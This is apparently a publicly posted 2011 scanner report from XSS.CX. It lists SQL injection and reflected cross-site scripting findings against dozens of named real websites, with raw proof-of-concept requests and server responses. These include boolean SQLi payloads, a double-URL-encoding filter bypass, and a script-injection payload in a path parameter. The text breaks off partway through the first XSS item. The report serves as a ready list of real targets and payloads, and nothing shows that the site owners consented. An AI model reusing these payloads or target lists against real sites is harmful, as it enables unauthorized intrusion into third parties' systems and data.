XSS, DORK, Report, Example, Proof of Concept, Various IP Hosts, Random Sample

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sat Apr 02 07:42:05 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler

Loading

1. SQL injection

1.1. http://www.airtran.com/server-status [REST URL parameter 1]

1.2. http://www.alibris.com/server-status [User-Agent HTTP header]

1.3. http://www.dogpile.com/server-status [name of an arbitrarily supplied request parameter]

1.4. http://www.guitarcenter.com/server-status [REST URL parameter 1]

1.5. http://www.inc.com/server-status [REST URL parameter 1]

1.6. http://www.rollingstone.com/server-status [REST URL parameter 1]

1.7. http://www.rollingstone.com/server-status [name of an arbitrarily supplied request parameter]

2. Cross-site scripting (reflected)

2.1. http://www.aboutus.org/server-status [REST URL parameter 1]

2.2. http://www.breitbart.tv/server-status [REST URL parameter 1]

2.3. http://www.buzzillions.com/server-status [REST URL parameter 1]

2.4. http://www.buzzillions.com/server-status [REST URL parameter 1]

2.5. http://www.cliffsnotes.com/server-status [REST URL parameter 1]

2.6. http://www.cliffsnotes.com/server-status [name of an arbitrarily supplied request parameter]

2.7. http://www.colbertnation.com/server-status [REST URL parameter 1]

2.8. http://www.craveonline.com/server-status [REST URL parameter 1]

2.9. http://www.craveonline.com/server-status [REST URL parameter 1]

2.10. http://www.craveonline.com/server-status [name of an arbitrarily supplied request parameter]

2.11. http://www.craveonline.com/server-status [name of an arbitrarily supplied request parameter]

2.12. http://www.davidsbridal.com/server-status [REST URL parameter 1]

2.13. http://www.dummies.com/server-status [REST URL parameter 1]

2.14. http://www.dummies.com/server-status [name of an arbitrarily supplied request parameter]

2.15. http://www.ea.com/server-status [REST URL parameter 1]

2.16. http://www.ecnext.com/server-status [REST URL parameter 1]

2.17. http://www.ecnext.com/server-status [REST URL parameter 1]

2.18. http://www.elyricsworld.com/server-status [REST URL parameter 1]

2.19. http://www.elyricsworld.com/server-status [REST URL parameter 1]

2.20. http://www.elyricsworld.com/server-status [name of an arbitrarily supplied request parameter]

2.21. http://www.elyricsworld.com/server-status [name of an arbitrarily supplied request parameter]

2.22. http://www.foodandwine.com/server-status [REST URL parameter 1]

2.23. http://www.inc.com/server-status [REST URL parameter 1]

2.24. http://www.inc.com/server-status [name of an arbitrarily supplied request parameter]

2.25. http://www.kaboose.com/server-status [REST URL parameter 1]

2.26. http://www.kaboose.com/server-status [name of an arbitrarily supplied request parameter]

2.27. http://www.manta.com/ [name of an arbitrarily supplied request parameter]

2.28. http://www.manta.com/ [name of an arbitrarily supplied request parameter]

2.29. http://www.manta.com/coms2/page_about_manta_contact [REST URL parameter 1]

2.30. http://www.manta.com/coms2/page_about_manta_contact [REST URL parameter 1]

2.31. http://www.manta.com/coms2/page_about_manta_contact [REST URL parameter 2]

2.32. http://www.manta.com/coms2/page_about_manta_contact [REST URL parameter 2]

2.33. http://www.manta.com/coms2/page_about_manta_contact [name of an arbitrarily supplied request parameter]

2.34. http://www.manta.com/coms2/page_about_manta_contact [name of an arbitrarily supplied request parameter]

2.35. http://www.manta.com/favicon.ico [REST URL parameter 1]

2.36. http://www.manta.com/favicon.ico [REST URL parameter 1]

2.37. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.38. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.39. http://www.manta.com/server-status [REST URL parameter 1]

2.40. http://www.manta.com/server-status [REST URL parameter 1]

2.41. http://www.mp3raid.com/server-status [REST URL parameter 1]

2.42. http://www.mp3raid.com/server-status [REST URL parameter 1]

2.43. http://www.mp3raid.com/server-status [name of an arbitrarily supplied request parameter]

2.44. http://www.mp3raid.com/server-status [name of an arbitrarily supplied request parameter]

2.45. http://www.mycricket.com/server-status [REST URL parameter 1]

2.46. http://www.mylifetime.com/server-status [REST URL parameter 1]

2.47. http://www.mylifetime.com/server-status [REST URL parameter 1]

2.48. http://www.schoolfusion.us/server-status [REST URL parameter 1]

2.49. http://www.stltoday.com/server-status [name of an arbitrarily supplied request parameter]

2.50. http://www.supercheats.com/server-status [REST URL parameter 1]

2.51. http://www.thehollywoodgossip.com/server-status [REST URL parameter 1]

2.52. http://www.thomasnet.com/server-status [REST URL parameter 1]

2.53. http://www.tradekey.com/server-status [REST URL parameter 1]

2.54. http://www.trails.com/server-status [REST URL parameter 1]

2.55. http://www.trails.com/server-status [name of an arbitrarily supplied request parameter]

2.56. http://www.travelpod.com/server-status [REST URL parameter 1]

2.57. http://www.uscellular.com/server-status [REST URL parameter 1]

2.58. http://www.uscellular.com/server-status [REST URL parameter 1]

2.59. http://www.uscellular.com/server-status [name of an arbitrarily supplied request parameter]

2.60. http://www.uscellular.com/server-status [name of an arbitrarily supplied request parameter]

2.61. http://www.videosurf.com/server-status [REST URL parameter 1]

2.62. http://www.walletpop.com/server-status [REST URL parameter 1]

2.63. http://www.washington.edu/server-status [REST URL parameter 1]

2.64. http://www.washingtontimes.com/server-status [REST URL parameter 1]

2.65. http://www.washingtontimes.com/server-status [REST URL parameter 1]

2.66. http://www.wisc.edu/server-status [REST URL parameter 1]

2.67. http://www.wisc.edu/server-status [REST URL parameter 1]

2.68. http://www.wisc.edu/server-status [REST URL parameter 1]

2.69. http://www.wisc.edu/server-status [name of an arbitrarily supplied request parameter]

2.70. http://www.wisc.edu/server-status [name of an arbitrarily supplied request parameter]

2.71. http://www.wisc.edu/server-status [name of an arbitrarily supplied request parameter]

2.72. http://www.yourdictionary.com/server-status [REST URL parameter 1]

2.73. http://www.zdnet.com/server-status [REST URL parameter 1]

2.74. http://www.acehardware.com/server-status [Referer HTTP header]

2.75. http://www.iboats.com/server-status [Referer HTTP header]

2.76. http://www.iboats.com/server-status [Referer HTTP header]

2.77. http://www.popcap.com/server-status [User-Agent HTTP header]

2.78. http://www.shoebuy.com/server-status [Referer HTTP header]

2.79. http://www.sportsauthority.com/server-status [Referer HTTP header]

2.80. http://www.zdnet.com/server-status [Referer HTTP header]

2.81. http://www.townhall.com/server-status [name of an arbitrarily supplied request parameter]

2.82. http://www.townhall.com/server-status [name of an arbitrarily supplied request parameter]



1. SQL injection  next
There are 7 instances of this issue:


1.1. http://www.airtran.com/server-status [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.airtran.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /server-status' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.airtran.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /ErrorHandler/CustomError.aspx?aspxerrorpath=/ErrorHandler/404.aspx
Content-Type: text/html; charset=utf-8
Content-Length: 184
Cache-Control: private, max-age=592
Expires: Sat, 02 Apr 2011 12:04:09 GMT
Date: Sat, 02 Apr 2011 11:54:17 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/ErrorHandler/CustomError.aspx?aspxerrorpath=/ErrorHandler/404.aspx'>here</a>.</h2>
</body></html>

Request 2

GET /server-status'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.airtran.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=600
Expires: Sat, 02 Apr 2011 12:04:17 GMT
Date: Sat, 02 Apr 2011 11:54:17 GMT
Content-Length: 10394
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="e
...[SNIP]...

1.2. http://www.alibris.com/server-status [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.alibris.com
Path:   /server-status

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 52232181'%20or%201%3d1--%20 and 52232181'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.352232181'%20or%201%3d1--%20
Host: www.alibris.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 02 Apr 2011 11:45:27 GMT
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 396

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /server-status
on this server.</p>
<p>Additionally, a 403 Forbidden
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address> Server at www.alibris.com Port 8104</address>
</body></html>

Request 2

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.352232181'%20or%201%3d2--%20
Host: www.alibris.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:45:29 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 16310
Connection: close





   
   
       


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">







<html>






   <head>
   

<script language="javascript" type="text/javascript">
<!--
   document.domain = 'alibris.com';
//-->
</script>





<title>Alibris: Used Books, Used Textbooks, Rare &amp; Out-of-Print Books</title><link rel="stylesheet" type="text/css" href="/framework/skins/alibris/css/alibrisPortal.css"><link rel="stylesheet" type="text/css" href="/css/body.css"><link rel="stylesheet" type="text/css" href="/framework/skins/alibris/css/book.css"><link rel="stylesheet" type="text/css" href="/framework/skins/alibris/css/button.css"><link rel="stylesheet" type="text/css" href="/framework/skins/alibris/css/form.css"><link rel="stylesheet" type="text/css" href="/framework/skins/alibris/css/layout.css"><link rel="stylesheet" type="text/css" href="/framework/skins/alibris/css/window.css"><link rel="stylesheet" type="text/css" href="/framework/skins/alibris/css/promos.css"><script src="/framework/skins/alibris/js/web.js" type="text/javascript"></script><script src="/framework/skins/alibris/js/delete.js" type="text/javascript"></script><script src="/framework/skins/alibris/js/float.js" type="text/javascript"></script><script src="/framework/skins/alibris/js/menu.js" type="text/javascript"></script><script src="/framework/skins/alibris/js/menufx.js" type="text/javascript"></script><script src="/framework/skins/alibris/js/skin.js" type="text/javascript"></script><script src="/framework/skins/alibris/js/util.js" type="text/javascript"></script><script src="/framework/skins/alibris/js/js_alibris.js" type="text/javascript"></script>




<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1" />
<META http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

<!-- .com -->
<META name="verif
...[SNIP]...

1.3. http://www.dogpile.com/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dogpile.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10635560%20or%201%3d1--%20 and 10635560%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status?110635560%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dogpile.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=f7d22c1b7edb40d790c42a9503f1cb01&SessionId=7f4975f35d27456fbaac2a9503f1cb01&ActionId=d871434c075d4aa39d6d2a9503f1cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sat, 02-Apr-2011 11:54:32 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=6795e4bd76b74056bd5c2a9503f1cb01&LastSeenDateTime=4/2/2011 11:34:32 AM&IssueDateTime=4/2/2011 11:34:32 AM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Mon, 09-Mar-2111 11:34:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 11:34:31 GMT
Connection: close
Content-Length: 42850
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
"http://www.dogpile.com/clickserver/_iceUrlFlag=1?rawURL=http%3A%2F%2Fsupport.dogpile.com%2Fstatic%2Fdownloads%2FDogpileMainToolbar.exe&amp;0=&amp;1=0&amp;4=173.193.214.243&amp;5=173.193.214.243&amp;9=d871434c075d4aa39d6d2a9503f1cb01&amp;10=1&amp;11=info.dogpl.other&amp;13=search&amp;14=1202&amp;15=internal-nav&amp;40=XfoGh9T10uZaspc5GIO0xg%3D%3D&amp;_IceUrl=true">Download Toolbar</a>
<a id="icePage_FavoriteFetchesAd_HomePage" href="http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11?_IceUrl=true">Make Dogpile Your Home Page</a>
<div><a id="icePage_FavoriteFetchesAd_DailyDealFetcher" class="new" href="http://www.dogpile.com/clickserver/_iceUrlFlag=1?rawURL=http%3A%2F%2Fwww.dailydealfetcher.com&amp;0=&amp;1=0&amp;4=173.193.214.243&amp;5=173.193.214.243&amp;9=d871434c075d4aa39d6d2a9503f1cb01&amp;10=1&amp;11=info.dogpl.other&amp;13=search&amp;14=295&amp;15=internal-nav&amp;40=jNL%2Bhu6UCMj2wjnoTtBm2A%3D%3D&amp;_IceUrl=true">Daily Deal Fetcher</a> <span class="new"> (new)</span></div>


<!-- AddThis Button BEGIN -->
<span divtype="AddThisContainer">
<div id="icePage_FavoriteFetchesAd_QuickStartAddThis_AddThisContainer" style="display: inline">
                       
<script type="text/javascript">
//<![CDATA[
var addthis_pub="arfie";
var addthis_brand="Dogpile";
var addthis_header_color="#ffffff";
var addthis_header_background="#2244fe";
var addthis_options="email, favorites, facebook, myspace, twitter, digg, delicious, stumbleupon, more";
var addthis_offset_top = 20;
var addthis_hover_delay = 0;
var addthis_append_data = true;
var addthis_share_url = 'http://www.dogpile.com/info.dogpl.rss/';
var callback_server_url = 'http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1?0=&1=0&4=173.193.214.243&5=173.193.214.243&9=d871434c075d4aa39d6d2a9503f1cb01&10=1&11=info.dogpl.other&14=1220&15=internal-nav&40=7C85U0KGPmVPPafG1zJiGA%3D%3D&_IceUrl=true';
//]]>
</script>
<a id="icePage_FavoriteFetchesAd_QuickStartAddThis_AddThisLink" onclick="logClick(callback_server_url);return addthis_open(this, '', addt
...[SNIP]...

Request 2

GET /server-status?110635560%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dogpile.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2 (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=117d55c063e043b38e3f2a9503f1cb01&SessionId=ce85b4fed77c47cfab2f2a9503f1cb01&ActionId=1aeb70dcd7cc4a2781202a9503f1cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sat, 02-Apr-2011 11:54:47 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=c0d9605a689f496592b92a9503f1cb01&LastSeenDateTime=4/2/2011 11:34:47 AM&IssueDateTime=4/2/2011 11:34:47 AM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Mon, 09-Mar-2111 11:34:47 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 11:34:47 GMT
Connection: close
Content-Length: 42840
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
"http://www.dogpile.com/clickserver/_iceUrlFlag=1?rawURL=http%3A%2F%2Fsupport.dogpile.com%2Fstatic%2Fdownloads%2FDogpileMainToolbar.exe&amp;0=&amp;1=0&amp;4=173.193.214.243&amp;5=173.193.214.243&amp;9=1aeb70dcd7cc4a2781202a9503f1cb01&amp;10=1&amp;11=info.dogpl.other&amp;13=search&amp;14=1202&amp;15=internal-nav&amp;40=Y4c518CnkBc5hNsNyzgQ6w%3D%3D&amp;_IceUrl=true">Download Toolbar</a>
<a id="icePage_FavoriteFetchesAd_HomePage" href="http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11?_IceUrl=true">Make Dogpile Your Home Page</a>
<div><a id="icePage_FavoriteFetchesAd_DailyDealFetcher" class="new" href="http://www.dogpile.com/clickserver/_iceUrlFlag=1?rawURL=http%3A%2F%2Fwww.dailydealfetcher.com&amp;0=&amp;1=0&amp;4=173.193.214.243&amp;5=173.193.214.243&amp;9=1aeb70dcd7cc4a2781202a9503f1cb01&amp;10=1&amp;11=info.dogpl.other&amp;13=search&amp;14=295&amp;15=internal-nav&amp;40=sA80K%2BylLzfgf5n%2FXPEREg%3D%3D&amp;_IceUrl=true">Daily Deal Fetcher</a> <span class="new"> (new)</span></div>


<!-- AddThis Button BEGIN -->
<span divtype="AddThisContainer">
<div id="icePage_FavoriteFetchesAd_QuickStartAddThis_AddThisContainer" style="display: inline">
                       
<script type="text/javascript">
//<![CDATA[
var addthis_pub="arfie";
var addthis_brand="Dogpile";
var addthis_header_color="#ffffff";
var addthis_header_background="#2244fe";
var addthis_options="email, favorites, facebook, myspace, twitter, digg, delicious, stumbleupon, more";
var addthis_offset_top = 20;
var addthis_hover_delay = 0;
var addthis_append_data = true;
var addthis_share_url = 'http://www.dogpile.com/info.dogpl.rss/';
var callback_server_url = 'http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1?0=&1=0&4=173.193.214.243&5=173.193.214.243&9=1aeb70dcd7cc4a2781202a9503f1cb01&10=1&11=info.dogpl.other&14=1220&15=internal-nav&40=x3eaeA9Nszsx12vh6l%2FEvw%3D%3D&_IceUrl=true';
//]]>
</script>
<a id="icePage_FavoriteFetchesAd_QuickStartAddThis_AddThisLink" onclick="logClick(callback_server_url);return addthis_open(this, '',
...[SNIP]...

1.4. http://www.guitarcenter.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.guitarcenter.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /server-status%2527 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.guitarcenter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
SN: 82
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 11:34:42 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /server-status%2527%2527 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.guitarcenter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:34:43 GMT
Server: Microsoft-IIS/6.0
ETag:
SN: 33
X-Powered-By: ASP.NET
Set-Cookie: ASP.NET_SessionId=adwvflte5xjr3vckqu4ygsc5; path=/; HttpOnly
Set-Cookie: ref=; path=/
Set-Cookie: ref_d=4/2/2011 7:34:43 AM; path=/
Set-Cookie: source=; path=/
Set-Cookie: ad_id=; path=/
Set-Cookie: orig_ref=; expires=Sat, 16-Apr-2011 11:34:43 GMT; path=/
Set-Cookie: orig_ref_d=4/2/2011 7:34:43 AM; expires=Sat, 16-Apr-2011 11:34:43 GMT; path=/
Set-Cookie: orig_source=; expires=Sat, 16-Apr-2011 11:34:43 GMT; path=/
Set-Cookie: orig_ad_id=; expires=Sat, 16-Apr-2011 11:34:43 GMT; path=/
Set-Cookie: uid=b368fe72-29b6-439a-81a4-9e66f4e3384a; expires=Mon, 02-May-2011 11:34:43 GMT; path=/
Set-Cookie: IsLoyaltyAvailable=False; expires=Mon, 02-May-2011 11:34:43 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 65425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__htmHead"><s
...[SNIP]...

1.5. http://www.inc.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.inc.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /server-status' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 02 Apr 2011 11:42:07 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.11
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from VoxCAST
Connection: close

Request 2

GET /server-status'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:42:07 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.11
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from VoxCAST
Content-Length: 39419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="h
...[SNIP]...

1.6. http://www.rollingstone.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.rollingstone.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /server-status' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rollingstone.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 500 Internal Server Error
X-Powered-By: PHP/5.3.3
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Server: Apache (Unix;)
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 11:43:44 GMT
Connection: close

Request 2

GET /server-status'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rollingstone.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
X-Powered-By: PHP/5.3.3
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Apache (Unix;)
Content-Length: 19008
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 11:43:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
   
...[SNIP]...

1.7. http://www.rollingstone.com/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.rollingstone.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /server-status?1'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rollingstone.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 500 Internal Server Error
X-Powered-By: PHP/5.3.3
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Server: Apache (Unix;)
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 11:43:43 GMT
Connection: close

Request 2

GET /server-status?1''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rollingstone.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
X-Powered-By: PHP/5.3.3
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Apache (Unix;)
Content-Length: 19008
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 11:43:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
   
...[SNIP]...

2. Cross-site scripting (reflected)  previous
There are 82 instances of this issue:


2.1. http://www.aboutus.org/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aboutus.org
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d530"><script>alert(1)</script>decd035a41f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status8d530"><script>alert(1)</script>decd035a41f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aboutus.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.1
ETag: "f336fe917e67c8845bc8cb7018375af6"
X-Runtime: 54
Content-Length: 13420
Set-Cookie: logged_in=false; path=/
Set-Cookie: _aboutus_session_key=BAh7BzoPc2Vzc2lvbl9pZCIlZTQzODcxYWIyMmU2ZWM1ZTA5OGFhZGM3NTE1MzVkZTEiDWFiX2luZGV4aXU%3D--7b52e1eabefe61c0cf5c1346c168fded617ae257; path=/; expires=Mon, 02-Apr-2012 11:41:01 GMT; HttpOnly
Cache-Control: max-age=0, public
X-Au-Rails-Sha1: 65ba32a
Server: nginx/0.8.54 + Phusion Passenger 3.0.1 (mod_rails/mod_rack)
X-node-id: rogue


<!doctype html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
